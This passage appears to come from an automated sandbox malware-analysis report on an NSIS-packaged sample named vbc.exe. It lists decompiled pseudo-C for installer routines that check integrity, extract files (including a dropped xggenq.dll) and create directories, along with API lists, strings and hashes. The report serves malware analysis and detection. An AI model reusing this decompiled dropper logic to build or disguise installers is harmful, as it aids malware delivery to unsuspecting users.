							 *0x423f50 = _t94;
							 *0x423f58 =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x423f5c =  *0x423f5c + 1;
								__eflags =  *0x423f5c;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
								__eflags = _t85;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E00405830(0x423f60, _t94 + 4, 0x40);
							__eflags = 0;
							return 0;
						}
						goto L29;
					}
					E004030B3( *0x40b0d8);
					_t65 = E00403081( &_a4, 4);
					__eflags = _t65;
					if(_t65 == 0) {
						goto L29;
					}
					__eflags = _v12 - _a4;
					if(_v12 != _a4) {
						goto L29;
					}
					goto L28;
				} else {
					do {
						_t67 =  *0x423f54; // 0x8200
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~_t67 & 0x00007e00) + 0x200;
						__eflags = _t93 - _t70;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						_t71 = E00403081(0x4170e8, _t90); // executed
						__eflags = _t71;
						if(_t71 == 0) {
							E00402BF1(1);
							L29:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x423f54;
						if( *0x423f54 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402BF1(0);
							}
							goto L20;
						}
						E00405830( &_v44, 0x4170e8, 0x1c);
						_t77 = _v44;
						__eflags = _t77 & 0xfffffff0;
						if((_t77 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v40 - 0xdeadbeef;
						if(_v40 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v28 - 0x74736e49;
						if(_v28 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v32 - 0x74666f73;
						if(_v32 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v36 - 0x6c6c754e;
						if(_v36 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t77;
						_t87 =  *0x40b0d8; // 0x8200
						 *0x423fe0 =  *0x423fe0 | _a4 & 0x00000002;
						_t80 = _v20;
						__eflags = _t80 - _t93;
						 *0x423f54 = _t87;
						if(_t80 > _t93) {
							goto L29;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v8 = _v8 + 1;
							_t93 = _t80 - 4;
							__eflags = _t90 - _t93;
							if(_t90 > _t93) {
								_t90 = _t93;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
						__eflags = _t93 -  *0x41f0e8;
						if(_t93 <  *0x41f0e8) {
							_v12 = E00405F97(_v12, 0x4170e8, _t90);
						}
						 *0x40b0d8 =  *0x40b0d8 + _t90;
						_t93 = _t93 - _t90;
						__eflags = _t93;
					} while (_t93 > 0);
					_t82 = 0;
					__eflags = 0;
					goto L24;
				}
			}

































                                                  0x00402c5d
                                                  0x00402c60
                                                  0x00402c63
                                                  0x00402c66
                                                  0x00402c6c
                                                  0x00402c7d
                                                  0x00402c82
                                                  0x00402c95
                                                  0x00402c9a
                                                  0x00402c9d
                                                  0x00402ca3
                                                  0x00000000
                                                  0x00402ca5
                                                  0x00402cb0
                                                  0x00402cb6
                                                  0x00402cc7
                                                  0x00402cce
                                                  0x00402cd4
                                                  0x00402cd6
                                                  0x00402cdb
                                                  0x00402cdd
                                                  0x00402dca
                                                  0x00402dcc
                                                  0x00402dd1
                                                  0x00402dd8
                                                  0x00000000
                                                  0x00000000
                                                  0x00402dda
                                                  0x00402ddd
                                                  0x00402e01
                                                  0x00402e06
                                                  0x00402e0c
                                                  0x00402e0e
                                                  0x00402e17
                                                  0x00402e1c
                                                  0x00402e1f
                                                  0x00402e20
                                                  0x00402e21
                                                  0x00402e23
                                                  0x00402e28
                                                  0x00402e2b
                                                  0x00402e3e
                                                  0x00402e42
                                                  0x00402e4a
                                                  0x00402e4f
                                                  0x00402e51
                                                  0x00402e51
                                                  0x00402e51
                                                  0x00402e59
                                                  0x00402e59
                                                  0x00402e5c
                                                  0x00402e5d
                                                  0x00402e5d
                                                  0x00402e60
                                                  0x00402e62
                                                  0x00402e62
                                                  0x00402e62
                                                  0x00402e6c
                                                  0x00402e72
                                                  0x00402e80
                                                  0x00402e85
                                                  0x00000000
                                                  0x00402e85
                                                  0x00000000
                                                  0x00402e2b
                                                  0x00402de5
                                                  0x00402df0
                                                  0x00402df5
                                                  0x00402df7
                                                  0x00000000
                                                  0x00000000
                                                  0x00402dfc
                                                  0x00402dff
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00402ce3
                                                  0x00402ce8
                                                  0x00402ce8
                                                  0x00402ced
                                                  0x00402cf1
                                                  0x00402cf8
                                                  0x00402cfd
                                                  0x00402cff
                                                  0x00402d01
                                                  0x00402d01
                                                  0x00402d05
                                                  0x00402d0a
                                                  0x00402d0c
                                                  0x00402e36
                                                  0x00402e2d
                                                  0x00000000
                                                  0x00402e2d
                                                  0x00402d12
                                                  0x00402d19
                                                  0x00402d95
                                                  0x00402d99
                                                  0x00402d9d
                                                  0x00402da2
                                                  0x00000000
                                                  0x00402d99
                                                  0x00402d22
                                                  0x00402d27
                                                  0x00402d2a
                                                  0x00402d2f
                                                  0x00000000
                                                  0x00000000
                                                  0x00402d31
                                                  0x00402d38
                                                  0x00000000
                                                  0x00000000
                                                  0x00402d3a
                                                  0x00402d41
                                                  0x00000000
                                                  0x00000000
                                                  0x00402d43
                                                  0x00402d4a
                                                  0x00000000
                                                  0x00000000
                                                  0x00402d4c
                                                  0x00402d53
                                                  0x00000000
                                                  0x00000000
                                                  0x00402d55
                                                  0x00402d5b
                                                  0x00402d64
                                                  0x00402d6a
                                                  0x00402d6d
                                                  0x00402d6f
                                                  0x00402d75
                                                  0x00000000
                                                  0x00000000
                                                  0x00402d7b
                                                  0x00402d7f
                                                  0x00402d87
                                                  0x00402d87
                                                  0x00402d8a
                                                  0x00402d8d
                                                  0x00402d8f
                                                  0x00402d91
                                                  0x00402d91
                                                  0x00000000
                                                  0x00402d8f
                                                  0x00402d81
                                                  0x00402d85
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00402da3
                                                  0x00402da3
                                                  0x00402da9
                                                  0x00402db5
                                                  0x00402db5
                                                  0x00402db8
                                                  0x00402dbe
                                                  0x00402dc0
                                                  0x00402dc0
                                                  0x00402dc8
                                                  0x00402dc8
                                                  0x00000000
                                                  0x00402dc8

                                                  APIs
                                                  • GetTickCount.KERNEL32(C:\Users\user\AppData\Local\Temp\,?,00000000), ref: 00402C66
                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\Public\vbc.exe,00000400), ref: 00402C82
                                                    • Part of subcall function 0040586F: GetFileAttributesA.KERNEL32(00000003,00402C95,C:\Users\Public\vbc.exe,80000000,00000003), ref: 00405873
                                                    • Part of subcall function 0040586F: CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405895
                                                  • GetFileSize.KERNEL32(00000000,00000000,0042C000,00000000,C:\Users\Public,C:\Users\Public,C:\Users\Public\vbc.exe,C:\Users\Public\vbc.exe,80000000,00000003), ref: 00402CCE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.472967159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.472962160.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.472975056.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473674188.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473725304.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473730999.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473739098.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                  • String ID: "C:\Users\Public\vbc.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\Public$C:\Users\Public\vbc.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft$pA
                                                  • API String ID: 4283519449-2896468223
                                                  • Opcode ID: d74ddf077dad9ccce0d63da47009af9ced08a9d3a58e0b3746407ee1fc4199ad
                                                  • Instruction ID: 62828f2e2b01cd2e9021f71d1007b468b6294b04ed91f3cf43b909f99e7c5814
                                                  • Opcode Fuzzy Hash: d74ddf077dad9ccce0d63da47009af9ced08a9d3a58e0b3746407ee1fc4199ad
                                                  • Instruction Fuzzy Hash: C151E371E00214ABDB209F64DE89B9E7BB4EF04355F20403BF904B62D1C7BC9E458A9D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00401751, Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147stringtimeCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 60%
                                                  			E00401751(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				void* _t85;

				_t75 = __ebx;
				_t82 = E00402A29(0x31);
				 *(_t85 - 0xc) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
				_t33 = E004056F8(_t82);
				_push(_t82);
				if(_t33 == 0) {
					lstrcatA(E0040568B(E00405B98(0x409c10, "C:\\Users\\Albus\\AppData\\Local\\Temp")), ??);
				} else {
					_push(0x409c10);
					E00405B98();
				}
				E00405DFA(0x409c10);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E00405E93(0x409c10);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E00405850(0x409c10);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E0040586F(0x409c10, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 8) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E00404E84(0xffffffe2,  *(_t85 - 0xc));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x423fc8;
						goto L32;
					} else {
						E00405B98(0x40a410, 0x425000);
						E00405B98(0x425000, 0x409c10);
						E00405BBA(_t75, 0x40a410, 0x409c10, "C:\Users\Albus\AppData\Local\Temp\nskF049.tmp\xggenq.dll",  *((intOrPtr*)(_t85 - 0x14)));
						E00405B98(0x425000, 0x40a410);
						_t62 = E00405459("C:\Users\Albus\AppData\Local\Temp\nskF049.tmp\xggenq.dll",  *(_t85 - 0x28) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x423fc8 =  &( *0x423fc8->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(0x409c10);
								_push(0xfffffffa);
								E00404E84();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00404E84(0xffffffea,  *(_t85 - 0xc));
				 *0x423ff4 =  *0x423ff4 + 1;
				_push(_t75);
				_push(_t75);
				_push( *(_t85 - 8));
				_push( *((intOrPtr*)(_t85 - 0x20)));
				_t43 = E00402E8E(); // executed
				 *0x423ff4 =  *0x423ff4 - 1;
				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x1c) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 8), _t85 - 0x1c, _t75, _t85 - 0x1c); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
						goto L22;
					}
				}
				CloseHandle( *(_t85 - 8)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E00405BBA(_t75, _t80, 0x409c10, 0x409c10, 0xffffffee);
					} else {
						E00405BBA(_t75, _t80, 0x409c10, 0x409c10, 0xffffffe9);
						lstrcatA(0x409c10,  *(_t85 - 0xc));
					}
					_push(0x200010);
					_push(0x409c10);
					E00405459();
					goto L29;
				}
				goto L33;
			}
















                                                  0x00401751
                                                  0x00401758
                                                  0x00401761
                                                  0x00401764
                                                  0x00401767
                                                  0x0040176c
                                                  0x00401774
                                                  0x00401790
                                                  0x00401776
                                                  0x00401776
                                                  0x00401777
                                                  0x00401777
                                                  0x00401796
                                                  0x004017a0
                                                  0x004017a0
                                                  0x004017a4
                                                  0x004017a7
                                                  0x004017ac
                                                  0x004017ae
                                                  0x004017b0
                                                  0x004017b5
                                                  0x004017b5
                                                  0x004017c0
                                                  0x004017c0
                                                  0x004017d1
                                                  0x004017d3
                                                  0x004017d3
                                                  0x004017d4
                                                  0x004017d4
                                                  0x004017d7
                                                  0x004017da
                                                  0x004017dd
                                                  0x004017dd
                                                  0x004017e4
                                                  0x004017f3
                                                  0x004017f8
                                                  0x004017fb
                                                  0x004017fe
                                                  0x00000000
                                                  0x00000000
                                                  0x00401800
                                                  0x00401803
                                                  0x0040185d
                                                  0x00401862
                                                  0x004015a8
                                                  0x0040268f
                                                  0x0040268f
                                                  0x004028be
                                                  0x004028c1
                                                  0x004028c1
                                                  0x00000000
                                                  0x00401805
                                                  0x0040180b
                                                  0x00401816
                                                  0x00401823
                                                  0x0040182e
                                                  0x00401844
                                                  0x00401844
                                                  0x00401847
                                                  0x00000000
                                                  0x0040184d
                                                  0x0040184d
                                                  0x0040184e
                                                  0x0040186b
                                                  0x004028c7
                                                  0x004028c7
                                                  0x004028c7
                                                  0x00401850
                                                  0x00401850
                                                  0x00401851
                                                  0x00401492
                                                  0x00402241
                                                  0x00402241
                                                  0x00402241
                                                  0x0040184e
                                                  0x00401847
                                                  0x004028c9
                                                  0x004028cd
                                                  0x004028cd
                                                  0x0040187b
                                                  0x00401880
                                                  0x00401886
                                                  0x00401887
                                                  0x00401888
                                                  0x0040188b
                                                  0x0040188e
                                                  0x00401893
                                                  0x00401899
                                                  0x0040189d
                                                  0x0040189f
                                                  0x004018a7
                                                  0x004018b3
                                                  0x004018a1
                                                  0x004018a1
                                                  0x004018a5
                                                  0x00000000
                                                  0x00000000
                                                  0x004018a5
                                                  0x004018bc
                                                  0x004018c2
                                                  0x004018c4
                                                  0x00000000
                                                  0x004018ca
                                                  0x004018ca
                                                  0x004018cd
                                                  0x004018e5
                                                  0x004018cf
                                                  0x004018d2
                                                  0x004018db
                                                  0x004018db
                                                  0x004018ea
                                                  0x004018ef
                                                  0x0040223c
                                                  0x00000000
                                                  0x0040223c
                                                  0x00000000

                                                  APIs
                                                  • lstrcatA.KERNEL32(00000000,00000000,ksurfviwic,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401790
                                                  • CompareFileTime.KERNEL32(-00000014,?,ksurfviwic,ksurfviwic,00000000,00000000,ksurfviwic,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017BA
                                                    • Part of subcall function 00405B98: lstrcpynA.KERNEL32(?,?,00000400,004031A9,jhaljjbgtengrcaq Setup,NSIS Error), ref: 00405BA5
                                                    • Part of subcall function 00404E84: lstrlenA.KERNEL32(0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000,?), ref: 00404EBD
                                                    • Part of subcall function 00404E84: lstrlenA.KERNEL32(00402FBE,0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000), ref: 00404ECD
                                                    • Part of subcall function 00404E84: lstrcatA.KERNEL32(0041FD10,00402FBE,00402FBE,0041FD10,00000000,0040F0E0,00000000), ref: 00404EE0
                                                    • Part of subcall function 00404E84: SetWindowTextA.USER32(0041FD10,0041FD10), ref: 00404EF2
                                                    • Part of subcall function 00404E84: SendMessageA.USER32 ref: 00404F18
                                                    • Part of subcall function 00404E84: SendMessageA.USER32 ref: 00404F32
                                                    • Part of subcall function 00404E84: SendMessageA.USER32 ref: 00404F40
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.472967159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.472962160.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.472975056.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473674188.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473725304.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473730999.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473739098.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                  • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nskF049.tmp$C:\Users\user\AppData\Local\Temp\nskF049.tmp\xggenq.dll$ksurfviwic
                                                  • API String ID: 1941528284-2454841499
                                                  • Opcode ID: 1d83eeb157989370eef6aca95033163bd7760edd2b6c2f47f904ee0373184e1d
                                                  • Instruction ID: ec6d4e4deed358595fa2340d5a7c786697911580d52a45c2a3a5a43c8a45cd53
                                                  • Opcode Fuzzy Hash: 1d83eeb157989370eef6aca95033163bd7760edd2b6c2f47f904ee0373184e1d
                                                  • Instruction Fuzzy Hash: 1C41E531900515BADF107FB5CC45EAF3679EF02329B60863BF425F10E2D67C9A418A6E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00402E8E, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 166fileCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 94%
                                                  			E00402E8E(int _a4, void* _a8, long _a12, int _a16, signed char _a19) {
				signed int _v8;
				long _v12;
				long _v16;
				long _v20;
				intOrPtr _v24;
				char _v88;
				void* _t62;
				void* _t63;
				intOrPtr _t74;
				long _t75;
				int _t78;
				void* _t88;
				intOrPtr _t91;
				void* _t93;
				long _t96;
				signed int _t97;
				long _t98;
				int _t99;
				void* _t100;
				long _t101;
				void* _t102;

				_t97 = _a16;
				_t93 = _a12;
				_v12 = _t97;
				if(_t93 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_t88 = _t93;
				if(_t93 == 0) {
					_t88 = 0x40f0e0;
				}
				_t60 = _a4;
				if(_a4 >= 0) {
					_t91 =  *0x423f98; // 0x95c6
					E004030B3(_t91 + _t60);
				}
				_t62 = E00403081( &_a16, 4); // executed
				if(_t62 == 0) {
					L34:
					_push(0xfffffffd);
					goto L35;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t93 == 0) {
							while(_a16 > 0) {
								_t98 = _v12;
								if(_a16 < _t98) {
									_t98 = _a16;
								}
								if(E00403081(0x40b0e0, _t98) == 0) {
									goto L34;
								} else {
									if(WriteFile(_a8, 0x40b0e0, _t98,  &_a12, 0) == 0 || _t98 != _a12) {
										L29:
										_push(0xfffffffe);
										L35:
										_pop(_t63);
										return _t63;
									} else {
										_v8 = _v8 + _t98;
										_a16 = _a16 - _t98;
										continue;
									}
								}
							}
							L45:
							return _v8;
						}
						if(_a16 < _t97) {
							_t97 = _a16;
						}
						if(E00403081(_t93, _t97) != 0) {
							_v8 = _t97;
							goto L45;
						} else {
							goto L34;
						}
					}
					_v16 = GetTickCount();
					E00406005(0x40b050);
					_t13 =  &_a16;
					 *_t13 = _a16 & 0x7fffffff;
					_a4 = _a16;
					if( *_t13 <= 0) {
						goto L45;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t99 = 0x4000;
						if(_a16 < 0x4000) {
							_t99 = _a16;
						}
						if(E00403081(0x40b0e0, _t99) == 0) {
							goto L34;
						}
						_a16 = _a16 - _t99;
						 *0x40b068 = 0x40b0e0;
						 *0x40b06c = _t99;
						while(1) {
							 *0x40b070 = _t88;
							 *0x40b074 = _v12; // executed
							_t74 = E00406025(0x40b050); // executed
							_v24 = _t74;
							if(_t74 < 0) {
								break;
							}
							_t100 =  *0x40b070; // 0x40f0e0
							_t101 = _t100 - _t88;
							_t75 = GetTickCount();
							_t96 = _t75;
							if(( *0x423ff4 & 0x00000001) != 0 && (_t75 - _v16 > 0xc8 || _a16 == 0)) {
								wsprintfA( &_v88, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t102 = _t102 + 0xc;
								E00404E84(0,  &_v88);
								_v16 = _t96;
							}
							if(_t101 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L45;
							} else {
								if(_a12 != 0) {
									_v8 = _v8 + _t101;
									_v12 = _v12 - _t101;
									_t88 =  *0x40b070; // 0x40f0e0
									L24:
									if(_v24 != 1) {
										continue;
									}
									goto L45;
								}
								_t78 = WriteFile(_a8, _t88, _t101,  &_v20, 0); // executed
								if(_t78 == 0 || _v20 != _t101) {
									goto L29;
								} else {
									_v8 = _v8 + _t101;
									goto L24;
								}
							}
						}
						_push(0xfffffffc);
						goto L35;
					}
					goto L34;
				}
			}
























                                                  0x00402e96
                                                  0x00402e9a
                                                  0x00402e9d
                                                  0x00402ea2
                                                  0x00402ea4
                                                  0x00402ea4
                                                  0x00402eab
                                                  0x00402eaf
                                                  0x00402eb3
                                                  0x00402eb5
                                                  0x00402eb5
                                                  0x00402eba
                                                  0x00402ebf
                                                  0x00402ec1
                                                  0x00402eca
                                                  0x00402eca
                                                  0x00402ed5
                                                  0x00402edc
                                                  0x0040302c
                                                  0x0040302c
                                                  0x00000000
                                                  0x00402ee2
                                                  0x00402ee6
                                                  0x00403017
                                                  0x0040306c
                                                  0x00403031
                                                  0x00403037
                                                  0x00403039
                                                  0x00403039
                                                  0x0040304a
                                                  0x00000000
                                                  0x0040304c
                                                  0x0040305f
                                                  0x00403011
                                                  0x00403011
                                                  0x0040302e
                                                  0x0040302e
                                                  0x00000000
                                                  0x00403066
                                                  0x00403066
                                                  0x00403069
                                                  0x00000000
                                                  0x00403069
                                                  0x0040305f
                                                  0x0040304a
                                                  0x00403077
                                                  0x00000000
                                                  0x00403077
                                                  0x0040301c
                                                  0x0040301e
                                                  0x0040301e
                                                  0x0040302a
                                                  0x00403074
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040302a
                                                  0x00402ef7
                                                  0x00402efa
                                                  0x00402eff
                                                  0x00402eff
                                                  0x00402f09
                                                  0x00402f0c
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00402f12
                                                  0x00402f12
                                                  0x00402f12
                                                  0x00402f1a
                                                  0x00402f1c
                                                  0x00402f1c
                                                  0x00402f2d
                                                  0x00000000
                                                  0x00000000
                                                  0x00402f33
                                                  0x00402f36
                                                  0x00402f3c
                                                  0x00402f42
                                                  0x00402f4a
                                                  0x00402f50
                                                  0x00402f55
                                                  0x00402f5c
                                                  0x00402f5f
                                                  0x00000000
                                                  0x00000000
                                                  0x00402f65
                                                  0x00402f6b
                                                  0x00402f6d
                                                  0x00402f7a
                                                  0x00402f7c
                                                  0x00402faa
                                                  0x00402fb0
                                                  0x00402fb9
                                                  0x00402fbe
                                                  0x00402fbe
                                                  0x00402fc5
                                                  0x00403005
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00402fc7
                                                  0x00402fca
                                                  0x00402fea
                                                  0x00402fed
                                                  0x00402ff0
                                                  0x00402ff6
                                                  0x00402ffa
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00403000
                                                  0x00402fd6
                                                  0x00402fde
                                                  0x00000000
                                                  0x00402fe5
                                                  0x00402fe5
                                                  0x00000000
                                                  0x00402fe5
                                                  0x00402fde
                                                  0x00402fc5
                                                  0x0040300d
                                                  0x00000000
                                                  0x0040300d
                                                  0x00000000
                                                  0x00402f12

                                                  APIs
                                                  • GetTickCount.KERNEL32(000000FF,00000004,00000000,00000000,00000000), ref: 00402EEC
                                                  • GetTickCount.KERNEL32(0040B0E0,00004000), ref: 00402F6D
                                                  • MulDiv.KERNEL32 ref: 00402F9A
                                                  • wsprintfA.USER32 ref: 00402FAA
                                                  • WriteFile.KERNEL32(00000000,00000000,0040F0E0,00000000,00000000), ref: 00402FD6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.472967159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.472962160.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.472975056.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473674188.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473725304.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473730999.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473739098.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: CountTick$FileWritewsprintf
                                                  • String ID: ... %d%%
                                                  • API String ID: 4209647438-2449383134
                                                  • Opcode ID: b944acebcfd11712949cb6564d56ed346294539165133d47b9c6a5aca850bb39
                                                  • Instruction ID: 896dd5a5e80e39cb813739a9bcc38eeef40bacba50e05a76af68061f47ce39f0
                                                  • Opcode Fuzzy Hash: b944acebcfd11712949cb6564d56ed346294539165133d47b9c6a5aca850bb39
                                                  • Instruction Fuzzy Hash: 13518A3190120AABDF10DF65DA04AAF7BB8EB00395F14413BFD11B62C4D7789E41CBAA
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00405346, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 39COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00405346(CHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x40735c;
				_v36.Group = 0x40735c;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x40734c;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryA(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}







                                                  0x00405351
                                                  0x00405355
                                                  0x00405358
                                                  0x0040535e
                                                  0x00405362
                                                  0x00405366
                                                  0x0040536e
                                                  0x00405375
                                                  0x0040537b
                                                  0x00405382
                                                  0x00405389
                                                  0x00405391
                                                  0x00405393
                                                  0x00000000
                                                  0x00405393
                                                  0x0040539d
                                                  0x004053a4
                                                  0x004053ba
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004053bc
                                                  0x004053c0

                                                  APIs
                                                  • CreateDirectoryA.KERNEL32(?,?,00000000), ref: 00405389
                                                  • GetLastError.KERNEL32 ref: 0040539D
                                                  • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004053B2
                                                  • GetLastError.KERNEL32 ref: 004053BC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.472967159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.472962160.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.472975056.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473674188.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473725304.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473730999.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473739098.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                  • String ID: C:\Users\Public$Ls@$\s@
                                                  • API String ID: 3449924974-3509358640
                                                  • Opcode ID: 6211b517ce48024f91031cad3a720f7e2baa8210faa46a43940225e11b136f78
